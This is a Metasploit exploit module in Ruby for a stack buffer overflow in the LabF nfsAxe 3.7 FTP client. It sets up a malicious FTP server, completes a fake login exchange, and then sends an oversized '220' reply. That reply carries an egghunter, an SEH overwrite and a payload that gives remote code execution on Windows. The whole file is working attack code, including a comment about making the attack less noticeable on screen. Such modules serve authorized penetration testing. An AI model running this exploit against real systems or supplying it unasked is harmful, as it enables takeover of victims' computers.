## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer include Msf::Exploit::Seh include Msf::Exploit::Remote::Egghunter def initialize(info = {}) super(update_info(info, 'Name' => 'LabF nfsAxe 3.7 FTP Client Stack Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in the LabF nfsAxe 3.7 FTP Client allowing remote code execution. }, 'Author' => [ 'Tulpa', # Original exploit author 'Daniel Teixeira' # MSF module author ], 'License' => MSF_LICENSE, 'References' => [ [ 'EDB', '42011' ] ], 'Payload' => { 'BadChars' => "\x00\x0a\x10", }, 'Platform' => 'win', 'Targets' => [ # p/p/r in wcmpa10.dll [ 'Windows Universal', {'Ret' => 0x6801549F } ] ], 'Privileged' => false, 'DefaultOptions' => { 'SRVHOST' => '0.0.0.0', }, 'DisclosureDate' => 'May 15 2017', 'DefaultTarget' => 0)) register_options( [ OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ]) ]) end def exploit srv_ip_for_client = datastore['SRVHOST'] if srv_ip_for_client == '0.0.0.0' if datastore['LHOST'] srv_ip_for_client = datastore['LHOST'] else srv_ip_for_client = Rex::Socket.source_address('50.50.50.50') end end srv_port = datastore['SRVPORT'] print_status("Please ask your target(s) to connect to #{srv_ip_for_client}:#{srv_port}") super end def on_client_connect(client) return if ((p = regenerate_payload(client)) == nil) print_status("#{client.peerhost} - connected.") res = client.get_once.to_s.strip print_status("#{client.peerhost} - Request: #{res}") unless res.empty? print_status("#{client.peerhost} - Response: Sending 220 Welcome") welcome = "220 Welcome.\r\n" client.put(welcome) res = client.get_once.to_s.strip print_status("#{client.peerhost} - Request: #{res}") print_status("#{client.peerhost} - Response: sending 331 OK") user = "331 OK.\r\n" client.put(user) res = client.get_once.to_s.strip print_status("#{client.peerhost} - Request: #{res}") print_status("#{client.peerhost} - Response: Sending 230 OK") pass = "230 OK.\r\n" client.put(pass) res = client.get_once.to_s.strip print_status("#{client.peerhost} - Request: #{res}") eggoptions = { :checksum => true } hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions) # "\x20"s are used to make the attack less obvious # on the target machine's screen. sploit = "220 \"" sploit << "\x20"*(9833 - egg.length) sploit << egg sploit << generate_seh_record(target.ret) sploit << hunter sploit << "\x20"*(576 - hunter.length) sploit << "\" is current directory\r\n" print_status("#{client.peerhost} - Request: Sending the malicious response") client.put(sploit) end end